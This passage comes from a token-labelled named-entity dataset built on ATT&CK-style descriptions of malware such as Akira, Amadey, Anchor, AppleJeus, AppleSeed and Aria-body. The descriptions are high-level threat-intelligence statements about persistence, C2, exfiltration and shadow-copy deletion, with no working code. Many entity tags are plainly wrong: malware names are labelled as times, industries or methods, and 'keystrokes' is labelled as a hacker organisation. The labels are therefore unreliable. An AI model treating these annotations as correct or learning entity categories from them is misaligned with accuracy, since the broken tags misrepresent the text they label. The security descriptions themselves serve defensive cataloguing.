[ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Akira", - "encrypts", - "victim", - "filesystems", - "for", - "financial", - "extortion", - "purposes." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Akira", - "examines", - "files", - "prior", - "to", - "encryption", - "to", - "determine", - "if", - "they", - "meet", - "requirements", - "for", - "encryption", - "and", - "can", - "be", - "encrypted", - "by", - "the", - "ransomware.", - "These", - "checks", - "are", - "performed", - "through", - "native", - "Windows", - "functions", - "such", - "as", - "<code>GetFileAttributesW</code>." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Akira", - "will", - "delete", - "system", - "volume", - "shadow", - "copies", - "via", - "PowerShell", - "commands." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Akira", - "executes", - "native", - "Windows", - "functions", - "such", - "as", - "<code>GetFileAttributesW</code>", - "and", - "`GetSystemInfo`." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Akira", - "can", - "identify", - "remote", - "file", - "shares", - "for", - "encryption." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Akira", - "will", - "execute", - "PowerShell", - "commands", - "to", - "delete", - "system", - "volume", - "shadow", - "copies." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Akira", - "verifies", - "the", - "deletion", - "of", - "volume", - "shadow", - "copies", - "by", - "checking", - "for", - "the", - "existence", - "of", - "the", - "process", - "ID", - "related", - "to", - "the", - "process", - "created", - "to", - "delete", - "these", - "items." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Akira", - "uses", - "the", - "<code>GetSystemInfo</code>", - "Windows", - "function", - "to", - "determine", - "the", - "number", - "of", - "processors", - "on", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Akira", - "executes", - "from", - "the", - "Windows", - "command", - "line", - "and", - "can", - "take", - "various", - "arguments", - "for", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Akira", - "will", - "leverage", - "COM", - "objects", - "accessed", - "through", - "WMI", - "during", - "execution", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Amadey", - "can", - "collect", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Amadey", - "has", - "decoded", - "antivirus", - "name", - "strings." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Amadey", - "has", - "sent", - "victim", - "data", - "to", - "its", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Amadey", - "has", - "used", - "fast", - "flux", - "DNS", - "for", - "its", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Amadey", - "has", - "searched", - "for", - "folders", - "associated", - "with", - "antivirus", - "software." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Amadey", - "can", - "download", - "and", - "execute", - "files", - "to", - "further", - "infect", - "a", - "host", - "machine", - "with", - "additional", - "malware." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Amadey", - "has", - "modified", - "the", - "`:Zone.Identifier`", - "in", - "the", - "ADS", - "area", - "to", - "zero." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Amadey", - "has", - "overwritten", - "registry", - "keys", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Amadey", - "has", - "used", - "a", - "variety", - "of", - "Windows", - "API", - "calls,", - "including", - "`GetComputerNameA`,", - "`GetUserNameA`,", - "and", - "`CreateProcessA`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Amadey", - "has", - "obfuscated", - "strings", - "such", - "as", - "antivirus", - "vendor", - "names,", - "domains,", - "files,", - "and", - "others." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Amadey", - "has", - "changed", - "the", - "Startup", - "folder", - "to", - "the", - "one", - "containing", - "its", - "executable", - "by", - "overwriting", - "the", - "registry", - "keys." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Amadey", - "has", - "checked", - "for", - "a", - "variety", - "of", - "antivirus", - "products." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Amadey", - "has", - "collected", - "the", - "computer", - "name", - "and", - "OS", - "version", - "from", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Amadey", - "does", - "not", - "run", - "any", - "tasks", - "or", - "install", - "additional", - "malware", - "if", - "the", - "victim", - "machine", - "is", - "based", - "in", - "Russia." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area" - ] - }, - { - "tokens": [ - "Amadey", - "can", - "identify", - "the", - "IP", - "address", - "of", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Amadey", - "has", - "collected", - "the", - "user", - "name", - "from", - "a", - "compromised", - "host", - "using", - "`GetUserNameA`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Amadey", - "has", - "used", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "has", - "been", - "signed", - "with", - "valid", - "certificates", - "to", - "evade", - "detection", - "by", - "security", - "tools." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "can", - "install", - "itself", - "as", - "a", - "cron", - "job." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Variants", - "of", - "Anchor", - "can", - "use", - "DNS", - "tunneling", - "to", - "communicate", - "with", - "C2." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "can", - "terminate", - "itself", - "if", - "specific", - "execution", - "flags", - "are", - "not", - "present." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "can", - "use", - "secondary", - "C2", - "servers", - "for", - "communication", - "after", - "establishing", - "connectivity", - "and", - "relaying", - "victim", - "information", - "to", - "primary", - "C2", - "servers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "can", - "self", - "delete", - "its", - "dropper", - "after", - "the", - "malware", - "is", - "successfully", - "deployed." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "can", - "download", - "additional", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Anchor", - "has", - "used", - "NTFS", - "to", - "hide", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "has", - "used", - "ICMP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "has", - "obfuscated", - "code", - "with", - "stack", - "strings", - "and", - "string", - "encryption." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "can", - "support", - "windows", - "execution", - "via", - "SMB", - "shares." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "Anchor", - "can", - "create", - "a", - "scheduled", - "task", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "can", - "create", - "and", - "execute", - "services", - "to", - "load", - "its", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "has", - "come", - "with", - "a", - "packed", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "can", - "determine", - "the", - "hostname", - "and", - "linux", - "version", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "can", - "determine", - "the", - "public", - "IP", - "and", - "location", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "can", - "execute", - "payloads", - "via", - "shell", - "scripting." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "has", - "used", - "HTTP", - "and", - "HTTPS", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "has", - "used", - "cmd.exe", - "to", - "run", - "its", - "self", - "deletion", - "routine." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Anchor", - "can", - "establish", - "persistence", - "by", - "creating", - "a", - "service." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "presented", - "the", - "user", - "with", - "a", - "UAC", - "prompt", - "to", - "elevate", - "privileges", - "while", - "installing." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "used", - "a", - "valid", - "digital", - "signature", - "from", - "Sectigo", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "decoded", - "files", - "received", - "from", - "a", - "C2." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "exfiltrated", - "collected", - "host", - "information", - "to", - "a", - "C2", - "server." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "deleted", - "the", - "MSI", - "file", - "after", - "installation." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "added", - "a", - "leading", - "<code>.</code>", - "to", - "plist", - "filenames,", - "unlisting", - "them", - "from", - "the", - "Finder", - "app", - "and", - "default", - "Terminal", - "directory", - "listings." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "AppleJeus's", - "installation", - "process,", - "it", - "uses", - "`postinstall`", - "scripts", - "to", - "extract", - "a", - "hidden", - "plist", - "from", - "the", - "application's", - "`/Resources`", - "folder", - "and", - "execute", - "the", - "`plist`", - "file", - "as", - "a", - "Launch", - "Daemon", - "with", - "elevated", - "permissions." - ], - "ner_tags": [ - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "placed", - "a", - "plist", - "file", - "within", - "the", - "<code>LaunchDaemons</code>", - "folder", - "and", - "launched", - "it", - "manually." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "loaded", - "a", - "plist", - "file", - "using", - "the", - "<code>launchctl</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "required", - "user", - "execution", - "of", - "a", - "malicious", - "MSI", - "installer." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleJeus's", - "spearphishing", - "links", - "required", - "user", - "interaction", - "to", - "navigate", - "to", - "the", - "malicious", - "website." - ], - "ner_tags": [ - "B-SecTeam", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "been", - "installed", - "via", - "MSI", - "installer." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "XOR-encrypted", - "collected", - "system", - "information", - "prior", - "to", - "sending", - "to", - "a", - "C2.", - "AppleJeus", - "has", - "also", - "used", - "the", - "open", - "source", - "ADVObfuscation", - "library", - "for", - "its", - "components." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "created", - "a", - "scheduled", - "SYSTEM", - "task", - "that", - "runs", - "when", - "a", - "user", - "logs", - "in." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "been", - "distributed", - "via", - "spearphishing", - "link." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "collected", - "the", - "victim", - "host", - "information", - "after", - "infection." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "waited", - "a", - "specified", - "time", - "before", - "downloading", - "a", - "second", - "stage", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "used", - "shell", - "scripts", - "to", - "execute", - "commands", - "after", - "installation", - "and", - "set", - "persistence", - "mechanisms." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "has", - "sent", - "data", - "to", - "its", - "C2", - "server", - "via", - "<code>POST</code>", - "requests." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleJeus", - "can", - "install", - "itself", - "as", - "a", - "service." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "gain", - "system", - "level", - "privilege", - "by", - "passing", - "<code>SeDebugPrivilege</code>", - "to", - "the", - "<code>AdjustTokenPrivilege</code>", - "API." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "has", - "compressed", - "collected", - "data", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "zip", - "and", - "encrypt", - "data", - "collected", - "on", - "a", - "target", - "system." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Features", - "O", - "B-HackOrg", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "has", - "automatically", - "collected", - "data", - "from", - "USB", - "drives,", - "keystrokes,", - "and", - "screen", - "images", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "has", - "divided", - "files", - "if", - "the", - "size", - "is", - "0x1000000", - "bytes", - "or", - "more." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "collect", - "data", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "find", - "and", - "collect", - "data", - "from", - "removable", - "media", - "devices." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "decode", - "its", - "payload", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "exfiltrate", - "files", - "via", - "the", - "C2", - "channel." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "has", - "exfiltrated", - "files", - "using", - "web", - "services." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "use", - "a", - "second", - "channel", - "for", - "C2", - "when", - "the", - "primary", - "channel", - "is", - "in", - "upload", - "mode." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "delete", - "files", - "from", - "a", - "compromised", - "host", - "after", - "they", - "are", - "exfiltrated." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "has", - "the", - "ability", - "to", - "search", - "for", - ".txt,", - ".ppt,", - ".hwp,", - ".pdf,", - "and", - ".doc", - "files", - "in", - "specified", - "directories." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "has", - "the", - "ability", - "to", - "use", - "JavaScript", - "to", - "execute", - "PowerShell." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "use", - "<code>GetKeyState</code>", - "and", - "<code>GetKeyboardState</code>", - "to", - "capture", - "keystrokes", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "stage", - "files", - "in", - "a", - "central", - "location", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "achieve", - "execution", - "through", - "users", - "running", - "malicious", - "file", - "attachments", - "distributed", - "via", - "email." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "disguise", - "JavaScript", - "files", - "as", - "PDFs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "AppleSeed", - "has", - "the", - "ability", - "to", - "rename", - "its", - "payload", - "to", - "ESTCommon.dll", - "to", - "masquerade", - "as", - "a", - "DLL", - "belonging", - "to", - "ESTsecurity." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time" - ] - }, - { - "tokens": [ - "AppleSeed", - "has", - "the", - "ability", - "to", - "use", - "multiple", - "dynamically", - "resolved", - "API", - "calls." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "has", - "the", - "ability", - "to", - "Base64", - "encode", - "its", - "payload", - "and", - "custom", - "encrypt", - "API", - "calls." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "has", - "the", - "ability", - "to", - "execute", - "its", - "payload", - "via", - "PowerShell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "enumerate", - "the", - "current", - "process", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "has", - "the", - "ability", - "to", - "create", - "the", - "Registry", - "key", - "name", - "<code>EstsoftAutoUpdate</code>", - "at", - "<code>HKCU\\Software\\Microsoft/Windows\\CurrentVersion\\RunOnce</code>", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "call", - "regsvr32.exe", - "for", - "execution." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "take", - "screenshots", - "on", - "a", - "compromised", - "host", - "by", - "calling", - "a", - "series", - "of", - "APIs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "has", - "used", - "UPX", - "packers", - "for", - "its", - "payload", - "DLL." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "has", - "been", - "distributed", - "to", - "victims", - "through", - "malicious", - "e-mail", - "attachments." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "identify", - "the", - "OS", - "version", - "of", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "identify", - "the", - "IP", - "of", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "can", - "pull", - "a", - "timestamp", - "from", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AppleSeed", - "has", - "the", - "ability", - "to", - "communicate", - "with", - "C2", - "over", - "HTTP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "identify", - "the", - "titles", - "of", - "running", - "windows", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "used", - "ZIP", - "to", - "compress", - "data", - "gathered", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "execute", - "a", - "process", - "using", - "<code>runas</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "collect", - "data", - "from", - "USB", - "devices." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "decrypt", - "the", - "loader", - "configuration", - "and", - "payload", - "DLL." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "use", - "a", - "DGA", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { 